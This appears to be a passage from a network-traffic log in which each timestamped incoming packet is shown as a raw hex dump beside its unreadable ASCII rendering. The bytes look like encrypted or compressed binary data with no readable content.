a6 cf cb 87 f1 e2 c9 6d 01 0c 57 a5 98 3c ce 84 3c fe 7a d8 98 a4 c6 19 c4 cc 5b 3f 63 36 18 ff 78 c8 61 77 94 f9 0e 73 4b a9 e3 8b fb 25 f8 ba 9b ec 8a 20 4c db e3 8f 9c 61 f3 20 48 c8 ba 93 9e 3b 90 0a c6 68 e8 ad 95 e7 cf Data Ascii: enfnFsk6CZV-W2gv5i)gF.m#RT@~!Z_0Z5nXtt7_'XcNt/Q~.!\|*)nv7N'wwomW<<z[?c6xawsK% La H;h
2021-12-14 11:52:59 UTC	125	IN	Data Raw: b2 d3 48 ba d4 67 92 60 d0 35 06 03 02 60 55 53 2c c3 a5 de 3d bc fe d6 67 49 e8 fd 0d 4d f1 63 40 de 18 98 f4 e5 77 18 b3 fa 40 22 da bd e9 50 d2 8c c6 ba 9f 23 fb 5a 2e 93 5b d0 00 05 3e 41 25 85 0c cf 8f fe ba 9e a7 c4 64 74 29 7a 5e 11 e0 5b 42 93 cf db a0 20 a9 b5 ae 1f 1b 57 c1 d1 ae 9b 4c 7e 2e d9 ab 0f c3 14 ec 1f 0b e5 92 e0 d3 6b 01 40 06 80 ce 15 a6 68 a9 ca 41 e1 15 71 c8 1b 1a 0d 79 1b 01 72 28 d8 63 b7 4f 06 35 3c 6b 26 a5 46 3c 04 81 5f cf 87 08 cb a3 07 fd b8 de 9b 44 7d c0 74 70 b9 33 3c 00 25 40 1e 99 ca 46 de 55 cf 4b 0e 06 48 ae 22 63 06 a1 53 f3 30 0c c8 e0 dc a0 27 30 f5 e4 f1 05 63 89 12 d2 10 a8 74 f2 13 f2 f8 56 61 c0 82 b5 cd 55 96 56 05 ea 2a 34 18 36 88 44 32 5f db cc 53 9f 8b 3f 96 68 d7 15 f0 57 53 43 22 e8 9e 99 d9 89 29 72 Data Ascii: Hg`5`US,=gIMc@w@"P#Z.[>A%dt)z^[B WL~.k@hAqyr(cO5<k&F<_D}tp3<%@FUKH"cS0'0ctVaUV*46D2_S?hWSC")r
2021-12-14 11:52:59 UTC	127	IN	Data Raw: 88 0e b0 fe 68 5b 9f 1c a1 17 89 d2 ec 9c f9 ba b3 f5 13 33 0d 79 34 e2 88 59 0c 3d d6 d1 b5 02 d2 3b ef ed c9 c4 36 e3 c4 43 3a fe 4c 17 5e b3 2c 01 f3 0d a3 f0 fc e2 77 16 2a 59 04 4a e9 30 89 7a 1e ad 93 0a 66 0a f7 2c f6 df 8d 99 9e f0 a1 e9 44 ba c1 95 29 88 9d 07 d7 93 ad 00 ca 77 4f 96 18 fb be bd 4a 30 88 e7 32 6b 08 03 b5 3b 79 f8 80 5c f3 1f e8 1f 71 73 3b 09 29 18 e5 6a b4 fe cb cf 06 40 36 0f 0b 87 62 24 fd d6 3a 2f 21 1f 52 b8 f5 e9 54 fa 9d 4c 2a b6 75 7d 22 d0 78 63 c5 37 82 b9 b4 53 63 f1 33 1d bd 1a d7 d4 43 42 09 5e d5 c1 b7 85 ed 0e 48 d7 d5 3f 51 5b c6 6f a2 fe 7f b0 d8 59 2b 44 4f 29 9c 39 29 7b d0 9f 67 fa b9 ca a0 47 b5 04 28 93 eb d8 46 0e 5e 3f e9 02 ec 29 42 9b 70 9a e6 7a 4a 59 57 5a f3 f1 94 e9 48 89 ba 6d 99 ca c6 59 34 03 0c Data Ascii: h[3y4Y=;6C:L^,wYJ0zf,D)wOJ02k;y\qs;)j@6b$:/!RTLu}"xc7Sc3CB^H?Q[oY+DO)9){gG(F^?)BpzJYWZHmY4
2021-12-14 11:52:59 UTC	128	IN	Data Raw: ad 6d 96 98 cd 0a 99 41 49 41 55 7d 58 8a 36 1f bf 2b 4b 97 9d 04 40 fd d5 dd 4e 7d 32 34 6c d8 2c 6f d9 82 d6 f6 ba 4a 9e e7 87 de 1c ed 6d 0a b9 7f b2 31 c9 31 fb 0c f2 1a 53 93 76 df b4 0f f3 79 ac d1 bf cb 07 1f df d8 17 29 3a 71 56 c4 7f 01 c1 ba f8 3f c7 82 4f 60 63 86 9b 0e 69 dc 6d 79 a3 9a a2 ca c3 7c 05 d6 dc c3 7c a4 24 f4 78 fb 97 5c 99 98 46 a3 da 30 86 40 dc 4e b2 19 6c 2c 89 45 d7 36 50 be 9a bd 41 51 71 0e 5e 44 08 e2 2b 14 27 cc db a2 15 98 51 12 33 15 75 c5 2c ab 09 42 58 35 dd af 38 e9 39 e8 35 63 b1 51 9f 4a 6e 1e 2c 80 3f c6 37 8b 51 dd f5 b5 fa 19 59 fa 16 32 26 51 41 79 c1 43 a6 fe ab d5 27 07 5e d7 1e 97 74 05 14 c0 52 1e 83 0e e1 e2 51 49 bb de 99 70 89 9b c0 7a 9f 29 3c 21 a0 68 1b bb ee 59 b2 5f 75 31 97 07 57 8f 15 47 9e 84 78 Data Ascii: mAIAU}X6+K@N}24l,oJm11Svy):qV?O`cimy\|\|$x\F0@Nl,E6PAQq^D+'Q3u,BX5895cQJn,?7QY2&QAyC'^tRQIpz)<!hY_u1WGx
2021-12-14 11:52:59 UTC	129	IN	Data Raw: a5 bb 56 91 a4 a0 a7 53 8e 57 40 19 75 14 86 23 e8 2b 2e 3a f3 1d 4f 2b 6d fc 8f 91 cc 70 5d d7 8e 68 6a 4f 9c e5 19 2f 25 af 5a 5f 1e d2 65 07 7c a8 e3 7f 96 ba 95 21 20 d4 ea 03 32 a1 0c ff 97 ba 2c be cc 58 7b 19 34 23 69 0b fb c1 9a d9 2c 99 9b 6d 30 29 54 21 db 9b 53 29 10 d9 d7 20 36 f2 be f7 c5 e4 d9 3c cd c3 c3 44 61 67 79 24 0a bc 01 f7 12 0d 4f f4 de 5e 10 a4 6d 24 c5 cb be 8e 65 14 9f 96 25 64 0c db 6c 0a 38 15 98 9a eb b4 e1 61 97 cf 29 13 90 ac b8 f5 01 ad 1e e2 7a df 91 1e d1 cc eb fe 33 88 e5 07 df ec bf 99 35 5b c7 25 7c 52 1d 72 3a 44 4a 30 2b ba 1e cf 00 ea f3 cd cf 02 42 29 b8 2c aa 6a 28 60 9f 83 8d 23 1b 72 35 dd c4 56 60 be 4b 51 ee cc e8 22 d4 67 7b c4 15 af b7 8c 64 76 d3 95 19 97 98 b2 65 6f 40 0d 78 6a ab c9 1c 76 2b 61 d9 ca 85 Data Ascii: VSW@u#+.:O+mp]hjO/%Z_e\|! 2,X{4#i,m0)T!S) 6<Dagy$O^m$e%dl8a)z35[%\|Rr:DJ0+B),j(`#r5V`KQ"g{dveo@xjv+a
2021-12-14 11:52:59 UTC	130	IN	Data Raw: ec fd 84 b9 01 9e a6 7f f0 03 4d cb c8 4b 11 a8 ea c8 34 7a fb 5b c9 e6 9d bf f2 23 81 5d 2d d8 38 1c 33 1e d6 3c 81 d8 a5 51 4d 94 15 3a 1e 63 f1 0a 61 6d 11 48 2c e5 39 99 df a3 6b 2e 1c 68 d6 07 bd 9f 89 c6 9f a9 c7 22 74 2c c1 d5 57 9f 3a 6a 3a 41 93 e5 8b 52 0e ef b1 2b b3 89 c2 da 7b 30 48 cc 59 83 09 80 be e9 5c 4d 67 b8 a0 a9 23 94 4d 2b 48 6d 6d 31 6f d1 fd 1e a0 ee f3 dc e6 35 47 1a 00 21 57 0e e1 7a 0f 07 c2 80 5d 0c fd 35 54 d8 b5 da db 76 d3 74 c2 9f b0 74 39 a2 8a 25 0d 4e 5e 40 1d 4a 8a ae 0e ea b1 0d 3d 60 45 f6 a4 6d f8 af 18 96 77 5d 4d b1 6d 56 6b bc 4a 33 a9 5b 16 32 57 1a f2 f1 2f 51 aa 79 5c 91 2a cd 98 ae d4 ee 23 b8 ff 0b ff 0d 80 2d 87 c7 7a d1 1f 1e a1 37 fc f2 c1 9e e3 94 b4 99 6d ac 26 fb 4e 64 ba c3 2d 30 72 f7 aa 31 68 9b c0 Data Ascii: MK4z[#]-83<QM:camH,9k.h"t,W:j:AR+{0HY\Mg#M+Hmm1o5G!Wz]5Tvtt9%N^@J=`Emw]MmVkJ3[2W/Qy\*#-z7m&Nd-0r1h
2021-12-14 11:52:59 UTC	131	IN	Data Raw: 49 a2 e4 77 36 d8 59 2d 72 e1 7a 07 38 2f 55 9a 2a fe fb b9 54 9a 50 3d 07 25 56 cd c7 7c 0e 8a 37 e9 02 ee 22 47 b4 72 9c ca 3a b2 be cf 5b f7 ea 8f bf 6d a4 b4 d1 a3 dc f4 c7 16 cf 0c 5d d8 c7 b5 c4 80 3f f7 5b 8b ca a7 c6 1b ec 31 a5 a7 62 32 34 32 b7 c8 6b 73 1a 22 22 77 93 88 25 8c d7 08 da 15 1f 5b f7 bd 6e f3 ca 8f 9e 1c 5b a7 36 55 93 c8 98 1b 54 77 47 69 72 8c bc e3 eb 31 56 11 4f f4 86 bf 21 6b bf 9d 84 3e bc f7 db 9f 29 af 36 ce 14 d9 fb b3 a3 c3 3e 31 82 6c f5 d3 b2 8e 50 3a 01 16 31 e7 0a b3 7e 04 97 46 38 84 5f 8f 90 0b e9 60 3a e5 0d 64 a9 84 37 06 36 a8 10 75 a5 4d 97 59 5c 5f 2c cd d1 a3 b4 dc 32 e5 0e 4b 62 03 f7 f7 1b e8 a5 19 7e 0e 71 45 bb 9a 57 29 9e 3d 11 f8 85 7d 5c 95 74 b0 91 06 44 ae a7 4e 4d 8e d1 db 64 e4 43 85 40 da 28 49 21 Data Ascii: Iw6Y-rz8/U*TP=%V\|7"Gr:[m]?[1b242ks""w%[n[6UTwGir1VO!k>)6>1lP:1~F8_`:d76uMY\_,2Kb~qEW)=}\tDNMdC@(I!
2021-12-14 11:52:59 UTC	133	IN	Data Raw: c8 0b 3c 2b a2 41 7f eb 09 27 6a aa d5 3c 15 1f 60 39 ba 7c 09 89 d7 eb cc 87 0a c1 0b 79 64 b9 44 ba 77 f6 c3 79 89 9f 2d 23 6b 36 43 36 b4 d5 6e f5 7d ad 33 bd 85 36 33 3c 6a 98 a4 8d ff 16 13 5b da a9 ae 0d 38 2b e6 f1 03 69 f8 62 4b 11 bf 58 c0 1b 68 db 51 ef 98 04 be d2 35 a9 a9 2d c7 28 ae 3b 31 c7 1c 8b aa db c8 4c b4 05 14 bb 63 ec 22 d6 4a 3c 5c 20 47 e2 00 de a3 4f 2c e1 68 d6 18 32 92 89 d5 b9 8f 18 a4 0a b5 e0 ce 5d bf 9c 70 12 6c 0b c0 a0 6a aa b1 8e 2a b3 8d c2 1b 73 30 48 49 65 86 35 a4 9e 19 76 cb 19 01 be a7 27 b4 f0 03 65 6f f7 12 68 41 a5 a7 06 ee f7 fc 31 65 4f 1a 9a 1b 73 37 ea 58 f8 01 e8 06 03 b6 f2 35 50 e2 35 f7 d9 76 4f 7b 6d f3 0f 55 91 a6 aa dd 2d 17 56 da 38 78 8b a0 03 10 b1 0b 17 c2 1c 61 a5 6d e5 a7 9c 94 77 5b fd 16 3e de Data Ascii: <+A'j<`9\|ydDwy-#k6C6n}363<j[8+ibKXhQ5-(;1Lc"J<\ GO,h2]plj*s0HIe5v'eohA1eOs7X5P5vO{mU-V8xamw[>
2021-12-14 11:52:59 UTC	134	IN	Data Raw: ef 4a d8 e9 22 47 00 95 2e 8a 6d 12 e2 e1 05 9d 0b 32 50 a1 db ee d4 84 02 67 40 cc cc 65 23 d4 67 c1 7a 3f be 91 b2 55 5a d1 95 3f af 0a cc fc 72 68 24 5a ff ad e3 9a 92 97 4d c8 e8 85 6e 77 c8 49 27 e2 72 09 fc 79 31 59 67 04 be 21 3f 51 ba fe ee d3 94 cc bf 7b 05 a3 7b 04 cc c7 78 0e f4 3c e9 02 6b 24 42 88 56 bc d7 11 34 c0 76 72 e7 ee af 6d 45 89 b6 4b 80 db 60 9f af 02 0c 59 f8 fb 3c ce 80 a5 cd 55 b1 c1 85 da 1c c6 b7 fb 0e 73 32 30 0d 5b e0 46 71 80 01 25 e3 cb 31 e9 8c d3 28 e7 bf 15 5b 6d 87 60 c9 c1 ad 83 1b 71 21 68 9d 82 c8 9c 24 93 5f 6a 6b e8 af bb 77 b3 88 99 11 4b d4 b8 70 2b 6b 25 a7 8b 04 b7 d5 c5 98 03 29 68 0d 05 d9 ff 8c 7f eb 13 33 18 4f f2 43 ea 37 9e 3a 05 36 0e 16 00 b3 e4 3e 98 7f 33 a6 40 88 ba 8d b7 94 2b e5 09 5f 51 a9 35 06 Data Ascii: J"G.m2Pg@e#gz?UZ?rh$ZMnwI'ry1Yg!?Q{{x<k$BV4vrmEK`Y<Us20[Fq%1([m`q!h$_jkwKp+k%)h3OC7:6>3@+_Q5
2021-12-14 11:52:59 UTC	135	IN	Data Raw: 3f ba ae 5a b5 36 c0 bb 9a bd c4 64 74 32 7a 64 31 c9 41 6a 9e 37 ca a6 0a e4 e3 1a 1c 1b 55 f0 c9 f5 2f 47 58 31 e6 c7 14 eb 39 74 3a 20 de ee be 0a 6b 01 44 3a e5 fa 38 ad 55 9d f8 73 fe 1f 73 63 67 83 0a 53 45 5f aa 28 d8 67 30 f0 0e 0a 11 6d 7a bb 7a 23 2b ad 60 cd 87 11 c5 d1 54 66 b9 d8 b5 dc 99 7c 58 7b 9b 0d 61 4a 3a 4d ac 91 e5 54 fe 5f ef 34 97 07 68 82 2f 6a 9c 9b 6d d7 3b 11 c1 f9 ae 39 55 81 d9 e6 f5 23 0a ea 6c 4b 8b 8d 5d ff 3f 48 9e 7a 6d e6 bd 84 c0 31 89 42 09 ef 05 36 1e 1a fc bc d5 c7 da c8 48 b4 55 1b bb 63 6b 2f d6 5a 1a 7a 4e c4 9c 99 ff fc 59 0c 14 77 c9 30 85 b5 a4 c2 b5 29 93 3d 0b b5 c4 f5 16 be 9c 6a a0 64 24 d2 80 60 6d ce 17 2b 93 f7 f0 ed 73 2f 6c fb 6d a9 24 84 94 69 08 52 18 21 a5 89 61 b5 ea 2b d2 48 da 06 64 e3 9d 3f 07 Data Ascii: ?Z6dt2zd1Aj7U/GX19t: kD:8UsscgSE_(g0mzz#+`Tf\|X{aJ:MT_4h/jm;9U#lK]?Hzm1B6HUck/ZzNYw0)=jd$`m+s/lm$iR!a+Hd?
2021-12-14 11:52:59 UTC	136	IN	Data Raw: 10 dd 70 14 85 a1 11 4e 21 df 46 8e 6c 0a e7 03 ee 94 77 41 f1 ce b3 36 27 98 b3 c7 b5 8d 78 e3 5a 4d b6 73 c4 d4 c3 cc 20 a0 ce 2f 5d 94 0c 1a 4b c6 e6 b6 78 72 7a e9 1f 69 c1 33 26 38 38 ef 67 cb 67 ca ef 7c 4a 01 95 33 82 41 00 e2 e7 30 0e 5d 86 53 a1 d9 e4 3e fb 9b 66 da ed c1 6d 04 f4 0f 5a 5f 12 8f 32 87 4c 5b cf bd 32 bf 1a ca d6 ec 3e 90 59 ff af e9 75 ed 0e 4c 52 c9 88 65 50 e8 20 bc c7 5f 3b 57 4c 2b 58 79 2c b3 3b 2f 57 90 63 80 62 b8 ce bb 5d 45 20 05 9d 57 e2 51 3f c9 1d 83 03 f1 01 4f 0c 65 9c cc 0a 1c ed 54 5a f1 c4 2d 0d f4 a5 b4 4f a6 9a e7 e1 36 99 29 70 c9 c1 1d a5 81 3f e8 58 3a f2 a5 c6 07 ee 9a d9 3e 65 18 b2 6c e3 c9 6b 77 a0 6b 0e 65 b5 32 cd a1 c6 2e da d2 14 5b f7 82 d0 ce e7 8d 85 32 5c 23 48 ca b8 4e e2 a2 9b 77 43 49 85 a8 91 Data Ascii: pN!FlwA6'xZMs /]Kxrzi3&88gg\|J3A0]S>fmZ_2L[2>YuLReP _;WL+Xy,;/Wcb]E WQ?OeTZ-O6)p?X:>elkwke2.[2\#HNwCI
2021-12-14 11:52:59 UTC	138	IN	Data Raw: 4c 9f c6 8d 5d ba d4 63 a5 60 e2 18 0f 3a 05 5e 60 79 01 c7 8f 5e 69 73 81 4f 62 69 61 e4 97 68 46 4c 4b d4 26 a7 6a cc 5a 1a 93 56 7d 78 a4 3b e7 78 fb 97 5c 99 98 ae a3 da 30 86 40 e3 a6 29 3c 41 b9 8a 77 a3 30 df 34 9b bd 5e 61 e0 34 5c 44 11 c1 69 47 bc cd dd 8c 8c 81 52 36 1e 1f 73 55 4a 8b b6 dc 7d 18 d4 a1 35 64 38 ee 1f 2d 0d df 9e 4a 75 12 6c 37 18 eb 3e 87 c8 cb 4c 70 fe 1d 79 75 18 1a 0b c9 64 52 f9 0f f8 f7 ab d5 23 38 e2 5a 3b ba 65 2a 23 84 70 cd 81 24 67 87 e0 65 b9 da bf cb e6 e5 59 e1 ba 00 31 6d 1a dc 37 b4 c8 66 06 68 ad 35 88 09 60 87 3f 6a 9a ae f8 81 8f 12 c1 fb a4 2d 2a 18 d8 7c d4 2e 5b cd 4c d9 10 a8 70 cd f5 7f dd 7b 72 ea b5 92 d0 31 8f 77 af b9 b1 35 1e 18 f6 a9 aa 5e db 52 69 b9 00 3c 9b f0 f0 0a fb 68 c4 4d 0a c5 85 b1 f2 a1 Data Ascii: L]c`:^`y^isObiahFLK&jZV}x;x\0@)<Aw04^a4\DiGR6sUJ}5d8-Jul7>LpyudR#8Z;e#p$geY1m7fh5`?j-\|.[Lp{r1w5^Ri<hM
2021-12-14 11:52:59 UTC	139	IN	Data Raw: fe 97 a5 9a b3 cc 48 5d 3f ad a0 17 92 da 82 87 f9 bc 86 87 45 87 0e 79 36 d7 39 bd b0 11 d9 f3 8a 85 f3 be ed 77 ec f6 2d ed c9 f5 3b f8 66 59 7f 33 2d 01 e9 3a ba 68 d9 c9 52 b2 4b f4 25 c5 ef 10 3c 64 14 85 24 2d 4b 1d fb 66 3d 47 8c 99 ba 88 8d 73 61 8b e7 9e 34 bd bb b4 57 ed 34 1f e2 5e 6d 20 1f d1 d4 59 f6 1c 99 c5 0d eb 93 26 98 15 32 fe b6 7c 4f 35 c5 1d 69 5d 3c 89 57 87 ce 00 ce 47 7d ce 02 5f 9b b0 03 bb 4a 22 55 e0 1a 8c 03 6b 4b a1 dd d3 7e d7 99 66 46 e2 6e 02 bb d5 67 5f 7f aa ae b7 92 d6 7e fc 84 39 9d a2 cd fc 6e 60 7c 41 ff ab d5 34 c1 0c 4c ce c6 27 0a ef c9 49 b9 e7 e6 1a da 59 b1 7d 4a 15 b8 19 96 50 ba e1 de 80 a0 ce bf 60 07 0c 07 9d cb ed fe 50 76 3c e9 06 d1 bb 6e 99 70 06 e9 3d 25 e6 76 e0 f6 ee af 53 ef bd b4 4b 9a d9 cb e3 36 Data Ascii: H]?Ey69w-;fY3-:hRK%<d$-Kf=Gsa4W4^m Y&2\|O5i]<WG}_J"UkK~fFng_~9n`\|A4L'IY}JP`Pv<np=%vSK6
2021-12-14 11:52:59 UTC	140	IN	Data Raw: 7b 2e a0 df 9e b7 dc 2a 93 f5 36 d8 54 5d 68 8e 54 85 82 2e 69 b3 82 60 4a 0e af 44 4f 62 39 3c 9a db 2c 69 69 c9 85 7e 9d 6a 41 f9 e4 44 19 f6 79 2c a6 0b ba 9c cf 31 fd 39 79 4c e7 90 76 dd be bd 8c e0 ad 4b 9e f9 72 a3 da 29 19 0f 25 35 41 56 7b 01 d6 8d f5 15 ea 86 65 e4 37 75 e4 97 6c fc b4 67 c6 00 1d c2 e0 4b 3c 93 21 6b 78 a4 04 d0 4b d6 95 44 b7 9f 2a dd 45 1b 00 3a 5a 29 28 38 61 fd ae 5a b1 8c da 97 88 9b 7e 9f 58 23 5c 64 34 d3 41 6a a1 c6 f3 8b 08 ff cd 1d 98 65 ca db 4b 8f 96 99 59 35 c6 1d 30 c6 2b c8 3f d2 ce c8 9e 6a 2f 1a 44 1a 05 fb 10 80 4c b5 d3 5b 78 67 c0 e4 19 1e 2b b3 40 7f eb b3 fd 4a b8 f3 03 f8 36 4d 3b 9a 2f 38 0b a9 6d ee af 23 e3 f9 7f 4e 3b a0 06 5b e7 e1 79 9a 9e 2d 23 d1 1f 60 27 92 e8 a7 d9 7f ad 15 ef 1c 48 aa 24 42 b1 Data Ascii: {.6T]hT.i`JDOb9<,ii~jADy,19yLvKr)%5AV{e7ulgK<!kxKDE:Z)(8aZ~X#\d4AjeKY50+?j/DL[xg+@J6M;/8m#N;[y-#`'H$B
2021-12-14 11:52:59 UTC	141	IN	Data Raw: 51 ef 17 b3 79 80 84 aa 24 2f 17 56 60 c7 49 9a 86 3f c0 9c 09 17 e4 11 e9 db f4 fd 8f b5 b6 75 5f d7 94 da 62 60 8e c5 13 ab 59 36 5b 7f fa ee ea 07 63 a2 51 77 b9 a8 b5 2b 2d aa 73 02 12 fb 2b fc 95 a5 00 0c c4 77 6a 39 3e a2 15 92 fa e1 74 e5 bc 99 87 45 87 0e 79 36 d7 3d bd b0 11 d9 f3 8a 35 f0 be ed 77 ec f6 2e ed c9 45 38 f8 66 59 d0 36 2d 01 e8 19 bf 47 db cf 7e 1a b7 13 bd c4 eb 34 a9 60 16 85 be 92 43 21 cc 60 a8 43 8e 99 9a cf 6f 6f 61 97 d4 9b 1b bf bd 98 ff 15 d3 87 e3 5a 49 b6 18 d3 d4 c3 49 14 a5 f1 0b 7d 94 24 98 35 7f e7 ab 7c 52 02 e4 37 44 59 16 0d 03 98 b1 99 cb 67 ce ef 05 5d 01 95 b4 8f 41 10 c4 c1 1d 8e 23 1f 72 ad c0 c4 56 e5 8d 4e 6d ca ec 7a 08 56 19 c2 5e 12 ab 97 9a 4e 5b d1 0f 3a 90 0b ea dc 66 42 09 58 df 89 d4 1c ec 10 64 e5 Data Ascii: Qy$/V`I?u_b`Y6[cQw+-s+wj9>tEy6=5w.E8fY6-G~4`C!`CooaZII}$5\|R7DYg]A#rVNmzV^N[:fBXd
2021-12-14 11:52:59 UTC	143	IN	Data Raw: 5a 3f 31 1c 69 f0 c3 94 ae 05 1f 2c 04 37 37 28 b1 7e 1b 95 70 0a 86 5f 96 e2 a5 ba fb 3b e3 23 c2 07 1d 36 06 a8 ad 14 65 83 6d dd 7c 71 4d 2a ff f3 a1 b4 c3 31 bb 3c 49 62 1a a7 59 48 73 a4 1f 50 a8 de dc ba 9a c9 2c 99 2d 37 d8 ce 58 71 87 72 a5 b0 04 44 b1 a2 96 7f 8c d1 c2 16 4a 10 1e 41 dc 06 ef 8d 75 a9 6f bf 6a b1 fa e4 44 a3 e5 4f 3e 80 3c b9 b3 cd 31 db 5b db 32 7e 8e 2e f1 b3 63 8d e6 87 53 c5 4d 62 85 fe d5 34 0d 25 15 ec 68 56 10 e7 85 f4 15 ea 80 6f c6 69 ec e5 8c 40 f1 6b 66 c0 2a 01 99 54 5b 1a b7 dc 47 7a a4 24 72 75 fb 87 7a bf 9f 2a dd 43 11 23 64 c3 28 37 31 69 0e ad 5a b7 3c 79 c4 03 bc 5e 45 79 0d 5e 44 0e 52 64 47 ac eb fb 88 08 ff cb 17 ac 3b 53 da 54 86 9e 6b 5a 35 c0 ad 93 95 a0 ef 1f 09 ef e7 9c 4a 6a 9b 61 37 08 cd 18 82 4c b5 Data Ascii: Z?1i,77(~p_;#6em\|qM1<IbYHsP,-7XqrDJAuojDO><1[2~.cSMb4%hVoi@kfT[Gz$ruz*C#d(71iZ<y^Ey^DRdG;STkZ5Jja7L
2021-12-14 11:52:59 UTC	144	IN	Data Raw: 05 cd 17 2d 99 0f 9c 74 72 30 4c f3 0f a9 24 82 24 ca 5b d9 3f 01 ee ab 27 b4 ca f1 6a 6d f7 0b 49 eb f6 3c 07 e8 d9 5a b8 fc 4e 1a 04 1e 0e 24 cc 78 95 24 c5 14 05 b5 ac 37 50 f8 3d 3f f9 76 49 4e cb a5 bb 56 91 a4 a0 a3 53 8e 57 40 19 75 cb 84 23 e8 2b 2e 3a f0 1d 4f f4 6f fc 8f 91 9f 54 5d d7 8b 4b 6f 60 9e e3 35 83 dd 48 c2 5e 1a f6 ca 55 7e a8 79 c0 9e 85 a1 27 8f 86 e8 03 12 df 1f dc 97 a5 1f 8c c9 77 79 1f 18 8b 91 ec 63 c0 9e fd 9c ca 99 6d aa 96 5c 1d ef 9d e3 7a 12 d9 f7 8a 1f d1 be ed f2 d1 f3 11 c9 e9 47 10 7e 18 e0 21 2a 29 21 a3 10 97 6a 43 ea 55 22 13 4d 70 c7 eb 30 a9 23 37 85 be 17 72 24 f0 44 88 40 a6 1b e4 76 95 73 65 b7 9a b1 36 bd 27 bb f8 82 8b 3e b7 58 4d 96 3e 8b f7 c3 d3 2f a0 ce 2f 5d 94 0c 1e 4b c6 e6 b6 78 72 4b ea 1f 69 c1 33 Data Ascii: -tr0L$$[?'jmI<ZN$x$7P=?vINVSW@u#+.:OoT]Ko`5H^U~y'wycm\zG~!*)!jCU"Mp0#7r$D@vse6'>XM>//]KxrKi3
2021-12-14 11:52:59 UTC	145	IN	Data Raw: 80 07 2f 40 90 a8 e8 93 db 20 d7 bc 15 5d dd 24 33 42 e6 8d 9a 3a 07 23 48 cc 08 ed b1 29 bc 57 31 6b e8 a9 b1 c0 e8 11 98 0e 44 dc 8b 73 2b 6d 95 04 d8 8f 90 f5 df b9 74 2b 48 57 8f fc d2 81 4a e3 49 33 18 49 f8 fd b1 ae 9f 25 11 3e 3c 15 00 b5 54 9d cb f7 14 86 5b a9 c2 8f 97 f9 a1 c0 24 56 5f a4 4f 04 ac 8d 1d 2b a6 6d 47 46 7d 77 21 dd da a5 9e 45 6f 54 22 49 66 25 a4 73 65 71 3e 3c 57 3c 86 65 c2 98 cd 0c 93 42 12 d8 54 62 55 bd 79 87 9a 00 6e 37 fc ff 61 8c d5 fd 34 60 3d 1c db ff 01 7b d5 cc d2 6d bb 4a ba 8e c1 44 39 df 43 04 8b 1e 92 b7 e7 b7 85 8a fa 32 7a b1 0d db 9e 61 17 c5 80 c3 9d f4 18 87 fa f5 38 98 00 15 76 52 53 29 ec a7 d8 11 c0 02 31 ff 48 ec e1 b7 14 de 69 66 5c 25 aa f6 eb 7a 66 b1 fc 6a 58 1b 01 e8 50 c1 bd 71 9d b2 2e f7 c1 4f 1f Data Ascii: /@ ]$3B:#H)W1kDs+mt+HWJI3I%><T[$V_O+mGF}w!EoT"If%seq><W<eBTbUyn7a4`={mJD9C2za8vRS)1Hif\%zfjXPq.O
2021-12-14 11:52:59 UTC	146	IN	Data Raw: e2 11 ec 47 41 cd 02 5f 21 12 08 aa 6c 1f ca cc 18 8c 25 35 d4 df 44 c5 56 fe bb ea 42 c8 ec e6 07 f9 75 7d 7f 9e ad b7 92 6c d5 f7 95 1f a2 14 e4 d1 6c 40 0f 72 79 d5 50 1d ec 0a 6c 45 ee a5 74 ec ed 64 af e1 7f 96 d8 59 2b 78 fb 22 9e 39 30 47 92 cc fc fb bf e4 39 03 b6 20 05 99 ed 49 7e 2e ef a7 cc 2f e3 27 4f 17 72 9c cc 30 86 e6 56 5a e8 fb 87 5e 6f a4 b2 61 04 8f 7f e0 36 07 2c d2 da e7 3d 54 a5 12 f9 5e 83 68 a7 c6 1d e6 70 fd 3e 63 25 18 3f 78 c8 6d 59 02 79 96 64 b5 ac c8 1c d5 08 fa 24 30 76 e6 84 6d 4b e5 8d 9e 3a b9 07 48 cc 8a e0 b1 39 9a 71 6d eb 96 30 90 f1 c9 31 09 13 4f f4 3c 54 06 7a 99 a2 37 14 91 f5 fb 53 25 29 48 40 3d f4 fd 93 6a e9 bc 4f 81 48 d8 c5 b4 3c 9d 3a 01 8c 34 3a 11 95 5e 89 b7 6e 15 a6 94 af ba 8d 8f d1 16 e7 09 42 53 06 Data Ascii: GA_!l%5DVBu}ll@ryPlEtdY+x"90G9 I~./'Or0VZ^oa6,=T^hp>c%?xmYyd$0vmK:H9qm01O<Tz7S%)H@=jOH<:4:^nBS
2021-12-14 11:52:59 UTC	147	IN	Data Raw: 28 3c 61 ef 88 5a b1 0f d7 97 98 bd 58 6b df 5d c5 45 0e cc 61 d9 bc cd db 3c 2f d2 d9 11 3e a8 51 da 4b ab 79 61 58 35 d9 9f 3d c6 3b ee 19 27 49 b6 07 4b 6a 05 64 ae 18 eb 38 37 6b 98 c7 57 de ad 5b e5 19 3a ec 74 41 7f f4 24 f0 4a a8 d5 25 32 b5 33 a2 bb 7a 27 2b 1c 70 cd 87 94 c4 d4 68 42 99 6b 9d 5a e7 c5 ad 5c 9f 2d 3a 63 17 4f 36 b2 e2 c4 a6 e6 ac 35 93 27 fe a8 3d 6a 06 a1 53 ee 30 33 77 fd 84 bf 0b ef ff e6 f1 1a 61 c6 6e 4b 17 82 f6 93 80 69 dd 7f 4d 51 9f bf d2 ab ac 70 3f e1 08 83 1c 1c d6 1a 51 79 db c8 53 9d 39 37 b9 63 f7 20 79 36 a5 5b 0a c1 bc 21 dd a3 4b 96 31 45 c7 3e 88 0f a6 c4 9f 8f ee 8c 0a b5 de fd 7e bd 9c 6c 10 c7 77 59 a7 40 2c ef ae 29 b3 89 78 c8 5e 22 6e f3 f9 a9 24 82 9e e4 5e cb 19 3e ad 81 0a b6 ea 2d 62 eb 89 8d 43 c3 df Data Ascii: (<aZXk]Ea</>QKyaX5=;'IKjd87kW[:tA$J%23z'+phBkZ\-:cO65'=jS03wanKiMQp?QyS97c y6[!K1E>~lwY@,)x^"n$^>-bC
